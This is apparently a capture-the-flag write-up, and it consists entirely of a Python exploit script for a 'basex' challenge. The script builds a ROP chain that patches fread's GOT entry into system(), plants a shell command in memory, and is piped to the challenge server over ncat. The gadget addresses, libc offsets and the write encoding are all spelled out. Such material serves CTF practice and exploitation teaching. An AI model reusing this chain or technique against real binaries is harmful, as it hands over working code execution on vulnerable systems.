Tags: ropchain rop 

Rating: 1.0

```
# python3 spl.py | ncat basex.challs.malice.fr 4444

import binascii

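def convert_to_base31(num, *, width=20):
    """Encode a non-negative integer as a fixed-width base-31 string.

    Digit values 0..30 are written as ``chr(48 + d)``: '0'..'9' followed by
    ':', ';', '<', '=', '>', '?', '@' and 'A'..'N'.  The most significant
    digit comes first and the result is left-padded with '0' to ``width``
    characters.  The challenge's decoder is assumed to use this same
    alphabet -- confirm against the server if a write lands wrong.

    Args:
        num: value to encode; must satisfy ``0 <= num < 31 ** width``.
        width: number of digits emitted (the challenge field is 20).

    Returns:
        A ``width``-character string.

    Raises:
        ValueError: if ``num`` is negative or needs more than ``width`` digits.
    """
    # Fail loudly: keeping only the low digits of an oversized value would
    # silently emit a wrong gadget address into the chain, and a negative
    # value would encode as an endless run of 'N' rather than two's complement.
    if num < 0 or num >= 31 ** width:
        raise ValueError(f"{num} does not fit in {width} base-31 digits")

    digits = []
    for _ in range(width):
        num, rem = divmod(num, 31)
        digits.append(chr(48 + rem))

    # divmod yields the least significant digit first
    return "".join(reversed(digits))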

def write_to_mem(addr, data):
    """Emit one write record for the challenge's "base X" input parser.

    Three fixed-width fields are printed back to back with no newline:
      1. ``data`` as 20 base-31 digits (see ``convert_to_base31``);
      2. ``(517 + addr) << 32`` as a zero-padded 20-digit decimal;
      3. 40 ASCII '0' characters.

    ``addr`` is a slot index rather than a raw address; the 517 offset and the
    ``<< 32`` presumably map it onto the target's stack layout -- confirm
    against the challenge binary before reusing this for other slots.
    """
    value_field = convert_to_base31(data)
    slot_value = (517 + addr) << 32
    slot_field = f"{slot_value:020d}"
    padding = "0" * 40
    print(value_field + slot_field + padding, end="")

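# --- gadgets and addresses taken from the challenge binary (non-PIE) ---
RET = 0x4004EE          # ret  (alignment pad before the eventual call)
POP_RDI = 0x4008F3      # pop rdi ; ret
POP_RBX_RBP = 0x40075F  # pop rbx ; pop rbp ; ret
ADD_DWORD = 0x4005F8    # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
FREAD_PLT = 0x400500    # fread@plt -- resolves through the GOT entry patched below
FREAD_GOT = 0x601018    # fread@got.plt
ADD_GADGET_DISP = 0x3D  # displacement baked into ADD_DWORD

# libc-specific offsets of fread and system.  They are tied to the exact
# libc build on the target; any other build breaks the chain.
LIBC_FREAD = 0x6D710
LIBC_SYSTEM = 0x41CD0

# 32-bit two's-complement delta.  Adding it to the low dword of fread@got turns
# the entry into system.  Only the low 32 bits are touched, so this relies on
# fread and system sharing their upper dword and on the subtraction not
# borrowing out of bit 31 -- true for all but a tiny fraction of libc bases;
# re-run on failure.
DELTA_TO_SYSTEM = (LIBC_SYSTEM - LIBC_FREAD) & 0xFFFFFFFF

# Slot -> value.  Slot 2 (the value popped into rdi) is deliberately not
# written: presumably whatever the target already holds there points at the
# command buffer placed at COMMAND_SLOT -- verify in the binary.
CHAIN = [
    (0, RET),
    (1, POP_RDI),
    (3, POP_RBX_RBP),
    (4, DELTA_TO_SYSTEM),               # rbx
    (5, FREAD_GOT + ADD_GADGET_DISP),   # rbp, so [rbp - 0x3d] == fread@got
    (6, ADD_DWORD),                     # fread@got += delta  ->  system
    (7, FREAD_PLT),                     # now behaves as system(rdi)
]

COMMAND = b"cat /srv/flag*"   # glob is expanded by the shell system() spawns
COMMAND_SLOT = 28


def _write_string(slot, data):
    """Write ``data`` from ``slot`` on as NUL-terminated little-endian 8-byte words."""
    # pad to a multiple of 8 while guaranteeing at least one terminating NUL
    padded = data + b"\0" * (8 - len(data) % 8)
    for offset in range(0, len(padded), 8):
        word = int.from_bytes(padded[offset:offset + 8], "little")
        write_to_mem(slot + offset // 8, word)


for slot, value in CHAIN:
    write_to_mem(slot, value)
_write_string(COMMAND_SLOT, COMMAND)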
```